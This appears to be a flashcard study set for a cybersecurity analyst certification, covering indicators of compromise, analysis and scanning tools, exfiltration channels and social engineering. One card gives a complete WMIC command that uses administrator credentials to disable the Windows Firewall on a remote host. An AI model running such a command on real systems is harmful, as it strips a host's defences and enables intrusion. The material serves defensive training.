Definition
Processor usage—Monitoring the per-process percentage of CPU time to locate problems. Monitoring real-time CPU usage of running processes can be accomplished on Windows using Task Manager and Performance Monitor.
Term
Memory consumption
Definition
Overall percentage of memory usage is not necessarily an IoC. Windows is optimized to make as much use of system memory as possible. Per-process use of memory is useful but varies widely. Many web browsers use an astonishing amount of system memory while running! Typical usage can be obtained using online resources such as shouldiblockit.com or simple search engine queries.
Term
File and File System Viewers
Definition
The standard Windows dir command has some advanced functionality for file system analysis. The following dir command switches can help to identify file system anomalies:
- /Ax filters all file/folder types that match the given parameter (x). For example, dir /AH displays only hidden files and folders. Malicious files marked as hidden are much easier to find this way rather than looking through every entry, especially if the folder contains hundreds or thousands of files.
- /Q displays file ownership, along with the standard information. This switch can reveal sensitive files whose ownership has been given to an unknown or unauthorized user.
- /R displays alternate data streams for a file. Attackers can use alternate data streams (ADSs) for anti-forensics purposes, and being able to spot an ADS can help identify a malicious process attached to a legitimate file.
Term
Drive Capacity Consumption
Definition
Applications and processes that consume a lot of drive capacity may be malicious. Malware sometimes caches files locally for exfiltration over the network or USB. Malware may also generate substantial log data if it is performing network scans. Disk utilization tools scan the file system and retrieve statistics, including the following:
- Visual representation of storage space. For example, a tree map can represent a hierarchy of folders and increase the visual size of folders, depending on how much data they hold.
- A directory listing of storage space, with folders and files sortable by size, extension, number of files, and more.
- The real-time usage of information being written to a disk.
Term
File System Analysis Tools for Linux
Definition
Linux comes with several tools to aid in analyzing the file system. One such tool is lsof, which retrieves a list of all files currently open on the OS. Although the output of lsof can be customized, it typically provides the following for each file:
- The process ID for the process that has the file open
- The owner of the process
- The size of the file
- The file's local or network address
- The file's TCP state, if applicable
- The file's access mode
Linux distributions include df and du command line tools for checking disk usage. With df, information about disk space use by all mounted file systems, as well as how much space is available for each, is displayed. The du command displays disk space used by each directory in a specified directory. To identify how large the /var/log/ folder is, the command du /var/log can be used.
Term
Unauthorized Scheduled Tasks
Definition
Scheduled Tasks is the Windows utility designed to allow routine or important maintenance processes to run in an organized and automated way. Scheduled tasks are often used to run backups and maintenance scripts and are also often abused by attackers and malware. Malware may use scheduled tasks to automate communication with a C&C server or launch a reverse shell when the system restarts. Monitoring scheduled tasks for changes and reviewing new items is important to ensure they are authorized.
Changes to Windows Scheduled Tasks generate an event recorded in the System or Security Event Log containing details about the change, such as the task's name, who made the change, and a timestamp. Event ID 4698 indicates a scheduled task was created or modified, and Event ID 4700 indicates a scheduled task was enabled or disabled. Searching for events using key words like "Task Scheduler" or "Task Scheduler Service" can also help locate activity.
Term
File System or Registry Changes
Definition
File system and registry changes can indicate or suggest a security breach or attack has occurred. An attacker may change critical system configuration stored in system files or registry keys to change or disable essential security settings or store malware and scripts.
- The creation of new files or folders in unexpected locations or with unusual names can be a sign of an attack.
- Unexpected or unauthorized changes to files can be a sign of tampering.
- Removing temp files, clearing temp folders, or deleting log entries can be a sign that an attacker is trying to cover their tracks and remove evidence of their actions.
- Changes to registry keys related to security settings often indicate an attempt to gain unauthorized access to or disable security features.
- Unauthorized changes to user accounts or group membership could indicate an attempt to gain elevated privileges or to create a backdoor. User and group settings are stored in /etc/passwd and /etc/group configuration files on Linux systems.
Term
Process Analysis Tools for Windows
Definition
- The Process Monitor and Process Explorer tools in the Sysinternals suite are widely used for live analysis and logging. It is also worth watching Sysinternals developer Mark Russinovich's presentation on advanced malware hunting techniques using Sysinternals (https://www.youtube.com/watch?v=A_TPZxuTzBU).
- tasklist is a command line version of Task Manager, displaying memory usage, the state of running threads, a process tree, and individual operations for each process. taskkill can be used to terminate suspect processes.
- PE Explorer (heaventools.com) is proprietary software that offers a variety of different features, including the ability to browse the structure of 32-bit Windows executable files. The main advantage of this is that you can observe what a program is accessing, like what dynamic-link libraries (DLLs) it calls and how it interfaces with other applications on the system, as well as how it uses application programming interfaces (APIs).
Term
Sysinternals Process Explorer
Definition
Process Explorer provides much deeper insight into the operation of processes currently running on a system.
These processes are often targets of attack or are mimicked to hide and obfuscate malware. The presence of multiple versions of these files, or these files running in any location other than the System32 folder, is indicative of infection. Right-clicking any of these processes in Process Explorer and selecting "Properties" reveals more details, including location, parent, and autostart location. Clicking the verify button validates the process's digital signature. Process Explorer also allows easy submission of the executable to VirusTotal for malware analysis.
Term
Process Analysis Tools for Linux
Definition
Like Windows, Linux programs can be foreground/interactive processes requiring user input or background (noninteractive). Background services are known as daemons and typically use a process name ending in a "d." When Linux boots, the kernel image is loaded into memory and executes an init daemon (usually systemd), which always has the process ID (PID) 1. The init daemon loads all the processes listed in its configuration file(s). A process launched by the user will be a child process to a parent process, such as the shell. Each process has a unique PID and a parent process ID (PPID). The pstree command can show the parent/child relationships of processes. The ps command lists the attributes of all current processes. By default, the command only displays processes started by the current user. A full list of all user processes can be viewed using the -A or -e switches. By default, the command shows the user that started the process, the PID and PPID, the TTY (which terminal executed the process), the execution time of the process, and the name of the process itself. Results can be filtered—for example, to find the process ID of cron, enter ps -C cron. Results can also be sorted by piping to the sort command—for example, to find the processes with the highest CPU utilization, enter ps -A | sort -k 3 to sort processes by execution time (which appears as column 3).
Term
Understand Unauthorized Change Concepts
Definition
An attacker may try to change how a device or application behaves to exploit some vulnerability or open a new vector to initiate an attack. For example, the attacker may open ports, start services on a workstation, or add a directory exclusion to scanning software, enabling them to take remote control of the host.
Unauthorized changes can also relate to suspicious hardware usage. A USB monitoring utility can report on devices attached to a system, which may supply evidence of the initial contamination vector or that data was removed.
The firmware of USB flash drives can be manipulated to make the device operate like a different device class, such as a keyboard, so it can be used to inject keystrokes into the host and execute preprogrammed commands. This type of attack is not very stealthy because it requires starting a command prompt window to "type" commands and writing changes to the Registry and system files.
Term
Unauthorized Privileges
Definition
After initial exploitation, one of the first objectives of an attack is typically to gain administrative access to the exploited system. A privilege escalation attack provides higher-level system access or functionality that the current user account would not usually have. One of the most common scenarios is when a regular user can exploit some vulnerability in a system to gain administrator or root-level privileges.
Privilege escalation attacks exploit a vulnerability or a misconfiguration in a system to escalate privileges beyond what was intended. After obtaining higher-level access, the attacker can access sensitive data, modify system configurations, or execute malicious code. This attack can be very damaging because it allows attackers to gain complete control over an entire network of devices. Oftentimes a privilege escalation attack results in administrative user access, and (in the case of Windows OS) the administrative user can then often control and modify the entire Windows desktop and server infrastructure.
Term
privilege escalation
Definition
The practice of exploiting flaws in an operating system or other application to gain a greater level of access than was intended for the user or application.
Term
Common IoCs Associated With Account Usage:
Definition
Unauthorized sessions—When accounts access devices or services they should not be authorized to access. For example, a user with limited privileges should not be able to access a Domain Controller—only administrators should have access to this, which could indicate unauthorized privilege escalation and compromise of the server.
Failed logons—Some failed logons are normal behavior of users mistyping or temporarily forgetting a password. Repeated, rapid failures for a single account are suspicious, especially for administrator and root accounts. Password attacks make thousands of attempts in a very short period.
New accounts—An attacker may create new accounts to enable easy access. Only a few individuals should be authorized to create new accounts, and account creation activity must be closely monitored.
Guest account usage—Guest accounts should be disabled. While guest accounts don't have many privileges, they enable attackers to easily access a domain.
Off-hours usage—Depending on the normal work hours, account usage after hours may indicate an attacker attempting to access the environment while little or no staff are at work.
Term
Abnormal Behavior
Definition
As well as abnormal user account behavior, monitoring changes to system policies (especially security policies) or privileges is also important. Microsoft provides several tools to help identify if a policy deviates from an established configuration baseline. Privilege changes can be tracked using the audit log or analyzed using tools like Sysinternals AccessChk and AccessEnum.
Term
Data exfiltration is accomplished in many ways, and some examples include the following:
Definition
HTTP (or HTTPS) transfers to file-sharing sites or suspicious domains. OneDrive, Dropbox, or Google Drive can be used to receive exfiltrated data. Blocking employee access to the sites makes the detection of malicious use easier.
HTTP requests to database-backed services. An adversary may use SQL injection or similar techniques to copy records from a database they should not have access to. Web Application Firewalls (WAF) can detect injection attacks. Other indicators of injection-style attacks are spikes in requests to PHP files or scripts and unusually large HTTP response packets.
DNS exploits for exfiltration and C&C activity. Indicators include atypical query types from client workstations. Most client requests are for host (A or AAAA) name records using UDP. Requests for TXT, MX, CNAME, and NULL records or DNS over TCP are typically suspicious.
Communication using FTP, IM, P2P, and email is also common and might involve consumer services such as Outlook.com, Gmail, and others.
Traffic tunnels such as SSH or VPNs are also indicative of suspicious communication.
Term
Nessus
Definition
One of the best-known commercial vulnerability scanners, produced by Tenable Network Security.
Term
OpenVAS
Definition
An open-source vulnerability scanner, originally developed from the Nessus codebase at the point where Nessus became commercial software.
Term
Qualys's
Definition
A cloud-based vulnerability management solution. Users install sensor agents at various points in their network, and the sensors upload data to the cloud platform for analysis.
Qualys's vulnerability management solution is a cloud-based service. Users install sensors at various points in their network, which can include cloud locations, and the sensors upload data to the Qualys cloud platform for analysis. The sensors can be implemented as agent software running on a host, as a dedicated appliance, or as a virtual machine (VM) running on a platform such as VMware. You can also deploy passive network sensors, out-of-band sensors for air-gapped hosts, and agents for cloud infrastructure and container apps. As well as the network vulnerability scanner, there is an option for web application scanning.
Term
Nmap
Definition
An IP and port scanner used for topology, host, service, and OS discovery and enumeration.
TCP SYN (-sS)—This is a fast technique also referred to as half-open scanning as the scanning host requests a connection without acknowledging it. The target's response to the scan's SYN packet identifies the port state.
TCP connect (-sT)—A half-open scan requires Nmap to have privileged access to the network driver so that it can craft packets. If privileged access is not available, Nmap has to use the OS to attempt a full TCP connection. This type of scan is less stealthy.
TCP flags—You can scan by setting TCP headers in unusual ways. A Null (-sN) scan sets the header bit to zero, a FIN (-sF) scan sends an unexpected FIN packet, and an Xmas scan (-sX) sets the FIN, PSH, and URG flags. This was a means of defeating early types of firewalls and IDS.
UDP scans (-sU)—Scan UDP ports. As these do not use ACKs, Nmap needs to wait for a response or timeout to determine the port state, so UDP scanning can take a long time. A UDP scan can be combined with a TCP scan.
Port range (-p)—By default, Nmap scans 1,000 commonly used ports. Use the -p argument to specify a port range or use --exclude-ports.
Term
Nmap Port States
Definition
Open—An application on the host is accepting connections.
Closed—The port responds to probes (with a reset [RST] packet), but no application is available to accept connections.
Filtered—Nmap cannot probe the port, usually because a firewall is silently discarding the probes.
Some types of scanning classify port states where the scan is unable to determine a reliable result:
Unfiltered—Nmap can probe the port but cannot determine whether it is open or closed. This port state is used with an ACK scan, the purpose of which is to test a firewall ruleset.
Open|Filtered—Reported by some types of scan (notably UDP and IP protocol) when Nmap cannot determine if the port is open or filtered.
Closed|Filtered—Reported by TCP Idle scans that cannot determine whether the port is closed or filtered.
Nmap Output Options
Nmap output scan results can be saved to a file instead of only displayed to the console. Several options exist, including the following:
Normal (-oN)—Human-readable output directed to a file for analysis later.
XML (-oX)—Output using XML formatting to delimit the information.
Grepable output (-oG)—This delimits the output using one line for each host and tab, slash, and comma characters for fields. This format makes it easier to parse the output using the grep command.
Term
Pretexting
Definition
In this attack, the attacker creates a false story or scenario to deceive the victim. For example, an attacker might phone an employee and pretend to be someone from the IT department, asking for their username and password to help solve an urgent problem.
Term
Baiting
Definition
In this attack, the attacker uses a promise or reward to lure the victim into sharing personal or confidential information, like a password. For example, an attacker often leaves a USB drive in a conspicuous location to tempt someone to connect it to their computer. The USB drive typically contains malware designed to autorun or an intriguing document with macros. Autorun-enabled malware is less effective on newer operating systems that disable autorun capability, so the intriguing document approach is much more common. A common example of this attack is to create a file with a name like "executive bonuses" or "staff layoff plans." Once opened, the file contains macro code designed to exploit the computer.
Term
Phishing
Definition
The most common type of attack leverages emails with malicious hyperlinks or malware-infected attachments. Clicking on the link leads the user to a website that typically prompts for credentials, or opening the attachment leads to the execution of a macro file resulting in an infection or launching a reverse shell.
Term
Simulating Social Engineering Attacks
Definition
To measure social engineering vulnerabilities, security analysts can play the role of the attacker by using various tools designed to help in this endeavor. Baiting and phishing attack simulations are very common and follow the same approach as an actual attack.
Several commercial tools are available to help organizations create and track various "campaigns." A campaign is designed to focus on one specific metric and runs during a defined time frame. Most commercial tools are cloud-based and offer sophisticated tracking and reporting capabilities. Social engineering assessment can also use open-source tools. Two very popular tools are the Social-Engineer Toolkit (SET) (https://github.com/trustedsec/social-engineer-toolkit) and Gophish (https://getgophish.com/). The Social-Engineer Toolkit offers many capabilities, such as creating a legitimate-looking webpage or creating malicious attachments, whereas Gophish is more focused on providing a user-friendly graphical interface and tools for managing campaigns.
Term
URL Shorteners
Definition
URL shorteners are online tools for creating short links from long URLs. They are common on social media, where character limits are a concern. While they offer convenience, they also pose security risks. Malicious actors can use URL shorteners to disguise harmful content, conduct social engineering attacks, and collect user data.
One of the primary risks associated with URL shorteners is phishing attacks. Attackers can use shorteners to disguise malicious links to trick unsuspecting users into clicking them. Additionally, URL shorteners often bypass controls like URL filtering and blocklisting, making detecting and mitigating malicious activity more difficult.
Another risk is data privacy. When users create shortened URLs, they often provide information to the shortening service, such as the original URL, the date and time of creation, and the IP address associated with the creator of the shortened link. This information can be used to track user activity across the Internet.
URL shorteners rely on third-party services to redirect users to the original URL. The shortened URL may no longer work if the third-party service goes offline or the link is not correctly maintained. This characteristic is typically referred to as "link rot."
To mitigate these risks, users should be cautious when clicking on shortened URLs, particularly if unfamiliar with the source. They should also use reputable URL shorteners and avoid creating shortened links for sensitive information. Additionally, users should inspect shortened URLs by revealing the original site.
Term
URL Un-shortening
Definition
Clicking a shortened link is not a good method of determining where it leads! If the link leads to a malicious site, then clicking it will lead to trouble. Fortunately, there are several sites designed to help investigate shortened URLs without clicking them, such as unshorten.me or VirusTotal.
Term
QR Codes
Definition
QR codes offer convenience and are often used to replace URLs. Most modern camera apps have built-in QR code recognition, allowing users to scan codes to visit websites without typing or clicking. QR codes offer a "fun factor," which makes them all the more enticing for users and effective for attackers.
Term
URL Doppelgangers
Definition
A doppelganger domain is one that is missing the dot between the subdomain and domain part, for example wwwgoogle.com instead of www.google.com. A savvy attacker may work to locate doppelgangers for popular websites and then register them as unique domains hosting malicious content. Fortunately, Google owns the doppelganger for their site, and it redirects to the originally intended destination.
Term
Character Swapping
Definition
Character swapping substitutes one or more characters in a URL for very similar looking ones. Depending on the font style, viewing the URL may not readily reveal that the link is incorrect.
Term
URL Encoding
Definition
URL encoding seeks to mask the content of a URL to avoid pattern matching or simple visual inspection detection methods and to confuse engineers, analysts, and users.
The following examples demonstrate a few methods to encode the URL https://www.comptia.org/certifications/cybersecurity-analyst/.
In this example, colons and slashes are replaced with their URL encoded (hexadecimal) equivalents, %3A represents : and %2F represents /.
[Figure: Screen capture of the DuckDuckGo® search engine decoding a URL. (Screenshot courtesy of DuckDuckGo®.)]
In this example, the entire URL is encoded using base64 and preceded with some qualifiers to help identify its purpose. Loading the string into a browser reveals what the string of characters represents.
The address bar contains the encoded string, and its translation is displayed in the body of the page.
Term
URL Redirects
Definition
In the context of obfuscation, URL redirects often take advantage of a poorly secured website. Website developers often program redirect functionality within their pages to send visitors to companion sites and payment processors. This redirect capability can be abused, allowing an attacker to use the site to send visitors anywhere. The redirect URL often looks like:
The vulnerable component is a PHP element and could use any name, not just "redirect.php" as shown here. The vulnerable component may use a different language, but PHP is very common. For example, if Google had this vulnerability on their site (they do not), the redirect may look like:
The appeal of this obfuscation method is that the URL's root (www.google.com) is trustworthy, but the user will land on the page referenced in the redirect, which is likely not trustworthy. Combining this method with other obfuscation techniques to mask the redirection URL can make it highly effective.
Term
Angry IP Scanner
Definition
Angry IP Scanner (https://angryip.org) is a graphical network scanning tool. The executable file (ipscan.exe) can quickly scan a network to identify connected devices, including configuration information and software versions.
Term
Metasploit Framework (MSF)
Definition
A platform for launching modularized attacks against known software vulnerabilities.
Metasploit Framework (MSF) is a very powerful collection of tools designed to exploit vulnerabilities in a wide range of systems and software. Metasploit Framework contains modules designed to exploit vulnerabilities. In the simplest terms, Metasploit can enable an attacker to gain unauthorized access with the least amount of complexity.
From the perspective of analysis, Metasploit can be used to validate the risk of a vulnerability by exploiting it. In particular, the Pro version of Metasploit includes advanced features and a web-based user interface for identifying and validating vulnerabilities. Many Metasploit tools and utilities are known to modern antimalware software, which will alert and block attacks it initiates.
Term
Recon-ng
Definition
Recon-ng has a syntax and use that parallels Metasploit Framework but Recon-ng is focused on performing web-based reconnaissance. Recon-ng uses workspaces to help organize information, and its functionality can be greatly expanded through the use of numerous add-on modules.
Recon-ng can speed the collection of host and domain information, quickly revealing an organization's external footprint to an attacker, such as IP addresses, subdomains, software versions, and many other attributes. It can also be used by analysts to review and monitor an organization's footprint to ensure it complies with policy and other security mandates.
Term
Maltego
Definition
Maltego is a tool specifically designed for information gathering and visualizing the relationships between various entities. It can gather information about domains, IP addresses, and other network entities to help identify potential targets for a cyber attack.
Term
Burp Suite
Definition
A proprietary interception proxy and web application assessment tool. Burp Suite is a web application security testing tool that provides comprehensive features for identifying and mitigating security vulnerabilities.
Burp Suite is a very popular tool for analyzing and exploiting web applications and is developed and maintained by PortSwigger Web Security (portswigger.net). As well as an interception proxy, Burp can perform automated tasks such as content discovery, fuzzing, password attacks, injection attacks, vulnerability scans, and much more. Burp Suite is available as a feature-restricted community edition and a subscription-based professional edition. Most advanced and automated features are only available in the professional edition.
Burp Suite includes an integrated browser pre-configured to use the intercepting proxy. Browser activity is captured, or "intercepted," and displayed on the Proxy Intercept tab. The proxy controls browsing activity, so each request is "held" until the tester is ready to proceed. This behavior allows the request to be inspected and potentially modified to manipulate the web application's operation, such as changing content-type parameters, cookie values, data values, and many other options.
Term
Zed Attack Proxy (ZAP)
Definition
An open-source interception proxy and web application assessment tool.
OWASP ZAP (Zed Attack Proxy) is a popular open-source web application testing tool. It has many features to support automated scanning, input manipulation, and API testing. Key features include an intercepting proxy for intercepting and modifying requests and responses between the browser and web application and an active scanner that can identify vulnerabilities such as SQL injection and cross-site scripting (XSS). Its plugin architecture can extend its capabilities, allowing users to create and share custom scripts and plugins. Additionally, ZAP provides detailed reports and alerts to help quickly identify and prioritize security issues.
Term
Nikto
Definition
Web application vulnerability scanner that can be used to identify known web server vulnerabilities and misconfigurations, identify web applications running on a server, and identify potential known vulnerabilities in those web applications. It can quickly scan multiple web servers and provide comprehensive information on any detected vulnerabilities.
Nikto is another popular web application scanner designed to use the command line, and the project website is https://www.cirt.net/nikto2. Nikto can discover the type of HTTP server and web applications running on a host and expose vulnerabilities contained within them.
Nikto scans using default settings can be easily performed using the command nikto -h
Term
Arachni
Definition
An open-source web application scanner
Arachni is another open-source web scanner application (arachni-scanner.com) available with both command line and web-based graphical interfaces. By default, the scanner audits HTML forms, JavaScript forms, JSON input, XML input, links, and any orphan input elements. The scanner actively tests many different vulnerabilities, including code injection, SQL injection, XSS, CSRF, local and remote file inclusion, session fixation, directory traversal, backdoors, insecure policies, server information leakage, personal data exposure, and others.
Arachni categorizes the severity of potential issues as high, medium, low, or informational. Arachni provides a detailed description of each vulnerability, the location in the web app where the vulnerability was exploited, what input was used to exploit it, and what document object model (DOM) element was exploited. In some cases, Arachni also links to the Common Weakness Enumeration (CWE) entry for some vulnerabilities to provide a more detailed description of an issue. It also reports specific information about how the scanner managed to exploit a vulnerability, including the specific HTTP request that triggered the issue and the server's response. Arachni provides more than technical details; there are also tabs for case management and issue timelines.
Term
Immunity Debugger
Definition
Appgate's Immunity Debugger is an advanced debugger and analysis tool used to reverse engineer and debug software. It is open-source and very popular among reverse engineers, malware analysts, and security researchers.
The Immunity Debugger provides comprehensive debugging and analysis features, such as memory analysis, simultaneous process analysis, breakpoints, and run-time patching. It includes extensive features, such as dynamic analysis, signature scanning, and code tracing. Immunity Debugger also supports a variety of architectures, including x86, x64, and ARM. Additionally, it supports scripting in Python and other languages, allowing analysts to customize and automate tasks.
Term
GNU Debugger
Definition
The GNU Debugger is a widely used debugging tool for Linux-based applications. It allows developers to examine and debug applications, inspect the runtime state, and modify the program's execution flow.
The GNU Debugger, also known as GDB, is a powerful debugging tool used to debug programs written in various programming languages such as C, C++, and Fortran. The GNU Project maintains GDB as open-source software. The GNU Debugger allows debugging both user-space and kernel-space programs. It can analyze the behavior of applications by inspecting memory, viewing the stack trace, and tracking application source code. It also allows users to modify the application's source code while debugging to manipulate its operation. GDB can debug Linux, Mac OS X, and Windows programs and is compatible with several compilers such as GCC, Clang, and Visual Studio.
Term
ScoutSuite
Definition
An open-source cloud vulnerability scanner designed for AWS, Azure, and GCP auditing.
ScoutSuite (github.com/nccgroup/ScoutSuite) is a powerful open-source security auditing tool used to assess cloud infrastructure security. It allows organizations to evaluate the security of their cloud environments across multiple providers and services, such as Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform (GCP). The tool collects data from a cloud platform using API calls. Then it compiles a report of all the discovered objects, including VM instances, storage containers, IAM accounts, data, firewall ACLs, and many others. The scanner ruleset can categorize discovered items with severity levels based on predetermined policies.
ScoutSuite is an open-source multi-cloud security auditing tool that supports AWS, Azure, and GCP environments. It assesses the security posture of cloud environments and provides a concise view of potential security risks and misconfigurations.
Term
Prowler
Definition
An open-source cloud vulnerability scanner designed for AWS auditing. Prowler is an open-source security tool that helps organizations evaluate their Amazon Web Services (AWS) infrastructure and ensure it adheres to industry best practices and compliance standards.
Prowler (github.com/toniblyx/prowler) is an audit tool for use with AWS only. It can detect misconfigurations and security issues, such as weak passwords, unpatched systems, and insecure protocol use. It can also be used to evaluate cloud infrastructure against the CIS Benchmarks™ for AWS (cisecurity.org/benchmark/amazon_web_services) and perform regulatory compliance checks.
Term
Pacu
Definition
Pacu is an open-source Amazon Web Services (AWS) exploitation framework for penetration testing engagements in AWS environments. It automates various attack scenarios and helps validate the effectiveness of cloud security controls.
An open-source cloud penetration testing framework.
Pacu (github.com/RhinoSecurityLabs/pacu) is designed as an exploitation framework for evaluating the security of an AWS environment. It includes modules for exploiting APIs and VM instances. An attacker or pen tester can use cloud-access credentials to determine how they may be abused to gather information about other accounts and configured services, or gain unauthorized access to cloud services.
Term
Shell Scripts
Definition
Shell scripts allow users and administrators to automate tasks using a scripting language like Bash or PowerShell. Shell scripts are perfect for repetitive or complicated tasks and are versatile, ranging from a few simple commands to highly complex programming structures.
Shell scripts are essential for automation and efficiency, and they can automate many tedious tasks that otherwise require slow and error-prone manual effort. For example, shell scripts are great for creating backups, automating software updates, performing software installations, and automating system maintenance.
Analysts can use shell scripts to locate important information stored in logs or automate complicated commands that depend on command line tools. For example, a script can use Nmap to find hosts with active ports 80 and 443 and then perform additional steps to collect more information about the discovered services before saving the results to a file.
Pen testers and attackers also leverage shell scripts to perform various tasks to enumerate hosts and networks or automate the steps required to exploit vulnerabilities.
Term
PowerShell (PS)
Definition
A command shell and scripting language built on the .NET Framework that uses cmdlets for Windows automation
PowerShell (PS) provides similar command line capabilities as UNIX and Linux systems. Early editions of the Windows operating system utilized the command prompt (cmd.exe). The cmd command line interpreter is still supported by new editions of Windows, but PowerShell offers far greater capability and is well suited to scripting.
Many of the same concepts used in Linux shell scripting also apply to PowerShell, but the command syntax is different. PowerShell is easily recognized by its use of cmdlets that utilize a Verb-Noun syntax. Examples of PowerShell cmdlets include Get-Help, Invoke-Command, New-Item, Set-Content, and many others. PowerShell scripts use the file extension .ps1.
Term
Windows Management Instrumentation Command-Line (WMIC)
Definition
A tool that provides an interface into Windows Management Instrumentation (WMI) for local or remote management of computers.
Windows Management Instrumentation Command-Line (WMIC) is a powerful command line tool for performing administrative tasks and is well suited to scripting and automation. WMIC is part of the Windows Management Instrumentation (WMI) framework. It allows administrators to query, configure, and manage various system components, such as the operating system, hardware, and services. It also provides access to hardware and software information and can be used to manage and deploy applications remotely.
Term
The power and versatility of WMIC also makes it a valuable tool for attackers. One popular capability of WMIC is process call create which allows an authenticated user to start a command on a remote host. This example uses WMIC to issue a command on the remote host 10.0.2.6 to disable the Windows Firewall:
Definition
wmic /node:10.0.2.6 /user:Administrator /password:CySAisC00L! process call create "cmd.exe /c netsh advfirewall set allprofiles state off"
Term
Python
Definition
A high-level programming language that is widely used for automation.
Python is an interpreted, high-level, general-purpose programming language used for a wide variety of purposes. It is versatile for everything from simple scripts to advanced web and desktop applications. Python is highly customizable and benefits from a large community of contributors. There are thousands of third-party libraries for Python to help adapt it to practically any purpose. Python is used in data science, finance, computer science, system development, software engineering, cybersecurity, and many other fields.
Python programs and scripts use the .py file extension. Running Python scripts requires the Python runtime, which is frequently included by default on many Linux systems. The extensibility and power of Python scripts allow them to perform many adversarial tasks. With the right skills, Python can perform everything from reconnaissance to exploitation, persistence, and cleanup.
Term
Regular expressions (regex)
Definition
A group of characters that describe how to execute a specific search pattern on a given text.
Regular expressions can validate data, find patterns in large amounts of text, search and replace text, validate email addresses, search for phone numbers, and replace instances of one word with another.
Term
JavaScript Object Notation (JSON)
Definition
A file format that uses attribute-value pairs to define configurations in a structure that is easy for both humans and machines to read and consume.
Input validation and transport encryption controls are essential protections for XML and JSON communication.
Term
Extensible Markup Language (XML)
Definition
A system for structuring documents so that they are human and machine readable. Information within the document is placed within tags, which describe how information within the document is structured.
Like Hypertext Markup Language (HTML), which is the standard language for documents designed for use in a web browser, Extensible Markup Language (XML) is a text-based markup language that uses tags derived from SGML. Unlike HTML, the primary purpose of XML is to transfer data, not display it. XML also uses opening and closing tags, but one of the key differences of XML is that the language itself does not define the “tags.” Instead, the author can invent the tags and the structure, allowing the developer to tag the data fields with something more meaningful.
Term
Anomalous Activity
Anomalous computer activity includes a wide range of activities, from harmless glitches to malicious cyberattacks. Some examples of anomalous activity include hardware failures, software bugs, human error, or cyber-attacks. Anomalous activity may or may not be malicious. It is up to the security analyst to determine the difference.
Definition
Unusual Network Traffic—This can include unexpected spikes in network activity, unusual data flow patterns, and communication with suspicious or unfamiliar IP addresses.
Abnormal Resource Utilization—This can include unusually high CPU or memory usage, which may be caused by malware, password attacks, resource-intensive applications, or hardware failures.
Suspicious User Behavior—This can include unauthorized attempts to access sensitive data, changes to system configurations or settings, the installation of unauthorized software, or accounts performing actions they should not be able to complete.
Unusual System Events—This can include error messages, system crashes, or unexpected shutdowns, which software bugs, hardware failures, or malicious activity may cause.
Term
Introduction of New Accounts
Definition
Introducing new accounts can indicate malicious activity, such as an attempt to gain unauthorized access to a system or network.
In many cases, attackers will create accounts to bypass existing security measures, such as passwords or multifactor authentication, or to gain elevated privileges on a system. New accounts are also a common means of establishing a backdoor, which can be used to maintain access or launch further attacks.
New accounts can also signify insider threats, where an employee or contractor may be attempting to gain access to data or systems they are not authorized to use. Sometimes employees create "ghost" accounts to obfuscate their activity and hide their primary user account from being listed on activity reports.
It is important to note, however, that introducing new accounts is not necessarily suspicious, as creating accounts is necessary for new employees and contractors. It is essential to consider the context in which new accounts are introduced to determine whether they are suspicious.
Term
Unexpected Output or Outbound Communication
Definition
Unexpected output can be a sign that an attacker has successfully compromised a system and is attempting to exfiltrate data, establish a backdoor, obtain secondary infectors, or communicate with a C&C system.
Term
examples of unexpected output
Definition
Event
Description
Unusual network traffic
This can include unexpected spikes in network activity, communication with unfamiliar IP addresses, or unusual data flow patterns, which may indicate data exfiltration or command and control (C2) activity.
Unexpected files or processes
This can include the appearance of unknown files or processes on a system, which may indicate malware or an attacker with access to a system.
Unexpected communication
This can include unexpected communication between applications and systems, which may indicate attempts to exploit vulnerabilities, establish a C2 channel, or exfiltrate data.
Communication with suspicious IP addresses
This can include communication with IP addresses that are known to be associated with malware, phishing campaigns, or other cyberattacks.
Unusual communication protocols
This can include unusual communication protocols not typically used in the environment, which may indicate attempts to bypass security measures or establish a C2 channel.
Large data transfers
This can include the transfer of large amounts of data to external IP addresses, which may indicate data exfiltration or the theft of sensitive data.
Communication during unusual times
This can include communication during unusual hours or outside of normal business hours, which may indicate attempts to evade detection.
Communication with suspicious domains
This can include contact with domains that are known to be associated with phishing campaigns, cyberattacks, or domains that have been recently registered.
Encrypted communication
This can include encrypted or obfuscated communication, which may indicate attempts to hide malicious activity from security personnel.
Term
Service Interruption
Service interruption can signify malicious activity, as it may indicate that an attacker has successfully compromised a system or network and is attempting to disrupt normal operations or deny access to critical resources. Some reasons why service interruption is a sign of malicious activity include the following:
Definition
Denial of Service (DoS) Attacks—Attackers may carry out DoS attacks to overwhelm a system or network with traffic or requests, rendering it unable to function correctly.
Ransomware Infection—Ransomware typically causes significant disruption to business operations.
Exploiting Vulnerabilities—When attackers exploit systems, it often causes services and applications to crash.
Insider Threats—Insider threats, such as employees or contractors with authorized access to systems, may intentionally or unintentionally cause service interruptions by misconfiguring systems, mishandling data, making mistakes, or introducing malware.
Term
Application Logs
Application logs can be a valuable source of information for identifying suspicious activity, as they record detailed information about the behavior of applications and users on a system or network.
Definition
Monitoring for Unusual or Unauthorized Access—Application logs document unauthorized access attempts and unusual activity patterns. For example, a log may show repeated login attempts from an unfamiliar IP address or user account, indicating a potential credential stuffing or brute-force attack.
Tracking Changes to Application Settings or Configurations—Application logs track changes to settings, which may indicate an attacker attempting to gain persistence or establish a backdoor.
Detecting Anomalies in Application Behavior—Application logs detect anomalies in application behavior, such as unexpected data inputs or unusual data flows, which may indicate attempts to exploit vulnerabilities or bypass security measures.
Identifying the Source of Security Incidents—Application logs can identify the source of security incidents, such as a malware infection or a phishing attack, by tracking the source of the initial access or communication.
Auditing User Behavior—Application logs store user activity data, such as changes to permissions, access attempts, authentication activity, and many actions to identify potential malicious activity.
Term
Secure Software Development Life Cycle (SSDLC)
Definition
A method of system development that incorporates security controls in every phase of the system's lifecycle.
The Secure Software Development Life Cycle (SSDLC) is a process for developing software that emphasizes security throughout the development lifecycle. It helps identify and mitigate security risks at every stage of the software development lifecycle, from initial design to testing and deployment. This contrasts with traditional software development lifecycles (SDLC) that focus on collecting and implementing functional (user) requirements. Traditional software development lifecycles produce software that works well but is not necessarily secure.
Term
OWASP Testing Guide
Definition
The OWASP Testing Guide is a comprehensive guide for testing the security of web applications. It is a project of the Open Web Application Security Project (OWASP) designed to help developers, testers, and security professionals identify and address security vulnerabilities in web applications.
The OWASP Testing Guide provides a structured approach to web application security testing and provides specific guidance for each of the following areas:
Information Gathering
Configuration and Deployment Management Testing
Identity Management Testing
Input Validation Testing
